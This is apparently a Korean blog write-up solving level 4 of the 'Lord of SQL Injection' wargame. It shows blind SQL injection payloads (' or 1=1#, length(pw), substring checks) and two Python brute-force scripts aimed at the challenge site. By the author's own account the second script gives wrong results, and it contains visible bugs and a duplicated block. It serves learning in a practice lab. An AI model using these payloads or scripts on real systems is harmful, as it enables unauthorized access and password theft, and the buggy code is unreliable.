Lord of sql injection [4]

los 문제풀이 _ 4번

 

 

이번 문제는 전 문제들과 다르게 sql 인젝션 방식이 아닌, 

blind sql injection 방법이다.

 

https://lucete1230-cyberpolice.tistory.com/94?category=851757

▲블라인드 sql이란?

 

 

문제는 admin 이라는 id에 일치하는 pw일때 해결된다.

 

즉 실제 db에 저장되어있는 admin 이라는 계정에 pw를 맞추어야 문제가 해결되는 것이다.

 

그렇다면 일단 pw의 길이를 알아내고, 후에 substring 함수를 이용해서 한글자씩 맞추는 수밖에 없다.

 

 

 

 

먼저 'or 1=1# 를 써서 쿼리를 참으로 만들어보았다.

Hello admin이라는 결과가 노출되었다.

 

 

 

 

'or 1=2 #를 입력하였더니 아무창도 출력되지 않는다.

 

즉 참 값을 반환하면 위 문장이 뜨는 걸로 참/거짓을 구분 할 수 있다.

 

los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php?id=admin&pw=%27or%20length(pw)=8%20%23

 

 

 

pw='or length(pw)=1# 이런식의 쿼리로 1,2,3,4,...쭉 숫자를 올려주었더니 8일 때

Hello admin이 출력되었다.

이것으로 보아 pw길이는 8이라는 것을 알 수 있다.

 

 

import requests
from bs4 import BeautifulSoup

query1 = "\' or length(pw)= %d#"
dbname =[]

# 사용하고 있는 DB 길이 알아내기.
print("========= Blind SQL injection ===========")
print("######################data 분석 중")

for num in range(0,100):
    dbname += [query1 % num]

    cookies = {'PHPSESSID': '2hoip0fomcakckdq57vnc05450', '__cfduid': 'd24d39185c1d300939a1a3990e085cb961598688032'}
    params = {'id': 'admin', 'pw': dbname}
    res = requests.get('https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php', params=params, cookies=cookies)
    code = res.text  # 전체 코드
    search = "Hello admin"  # 참일시 나오는 결과 값

    if search in code:
        print("Password Length : ",num)
        break


print("###########################완료")

 

 

위 코드로 pw길이를 구할 수 있다. 8글자 인 경우에는 하나씩 입력해볼 수 있지만,

hash 값 같은 경우 훨씬 그 이상의 값이 들어가므로 파이썬을 공부해보는 것도 좋은 방법인 것 같다.

requets 모듈을 공부하면 될 것 같다!

 

8글자 라는 것을 알았으니, 한 글자씩 대입하여, pw값을 구하면 된다.

 

 

 

이때는 substring함수를 이용해서 찾아주면 되는데 pw,1,1 즉 첫번째 글자를 알아보는 쿼리이다.

2를 입력하니 hello admin이 출력되었다.

 

이렇게 8글자를 찾아주면 되는데 0-9/a-z 그외에 특수문자등 섞이게 되면 

하나하나 일일이 치기가 힘들다. 그래서 마찬가지로 파이썬 툴을 만들어 보았다.

 

 

 

 

소스 코드를 보면 이런식으로 html코드를 볼 수 있는데 참인 경우 hello admin 을 출력하니 참고하여 

파이썬 툴을 짰다.

 

 

import requests
from bs4 import BeautifulSoup

query1 = "\' or substring(pw,%d,1)= %s#"
dbname =[]
word =['a', 'b', 'c', 'd', 'e', 'f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
     'w','x','y','z','1','2','3','4','5','6','7','8','9','0','~','!','@','#','$','%','^','&','*','(',
     ')','_','-','+','=','/',';',':','.',' ',"  ",',','[','{',']','}','&&','|','||','<','>','!!']
#print("상태 코드 : ",res.status_code)

import requests
from bs4 import BeautifulSoup

query1 = "\' or substring(pw,%d,1)= %s#"
dbname =[]
word =['a', 'b', 'c', 'd', 'e', 'f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
     'w','x','y','z','1','2','3','4','5','6','7','8','9','0']
#print("상태 코드 : ",res.status_code)

print("========= Blind SQL injection ===========")
# 1. 사용하고 있는 DB 길이 알아내기.

print("######################data 분석 중")

num = 0
while num <= 8:
    num = num+1
    for str in word:
        dbname += [query1 %(num,str)]

        cookies = {'PHPSESSID': '2hoip0fomcakckdq57vnc05450', '__cfduid': 'd24d39185c1d300939a1a3990e085cb961598688032'}
        params = {'id': 'admin', 'pw': dbname}
        res = requests.get('https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php', params=params, cookies=cookies)
        code = res.text  # 전체 코드
        search = "Hello admin"  # 참일시 나오는 결과 값

        if search in code: #코드안에 참일 시 나오는 값이 들어가 있다면
            print("Password : ", str)
            break


print("###########################완료")

 

 

파이썬을 접한지 얼마 안되어 코드가 간결한 것보단 완성을 하는것에 목표를 두었다..ㅠ

코드를 돌려봤는데 결과가 좀 이상한 것 같았다..

 

다른 사람들이 올린 해설을 보면, 295d8544라는 값을 정답이라 하였는데,

만든 툴을 이용해서 돌려보니

 

 

 

값이 자꾸 이상하게 나왔다. 그래서 sql 쿼리문에 substring으로 한글자씩 체크를 해보았는데

 

정답과 달랐던 3번째 글자부터 체크를 해보았다.

 

 

정답대로 라면 5만 참이 떠야함

4일경우에도 참에 해당되었던 결과 hello admin이 출력됨.

 

 

 

 

4번째 글짜 역시 참에 해당하는 값이 한개가 아님.

그 이후 글자도 역시, 참 결과를 주는 값이 한개는 아니네요.

이럴경우 문제가 잘못 되었다고 해야할지.............코드가 잘못된 걸지..

 

일단 코드에 abcd 등.. ''a'' 로 되어야 해서 코드를 좀 수정 하였더니 'd'는 정상적으로 뜨지만,

여전히 다른 값이 뜨네요.

 

참에 해당하는 앞에있는 값이 나오는 것 같아요.^^/

 

 

어찌되었든, 정답은 위에 값이 답이였기 때문에 일단 넘겼습니다..^^ 조금 찝찝하네요 조금 더 자세히

공부해봐야겠어요.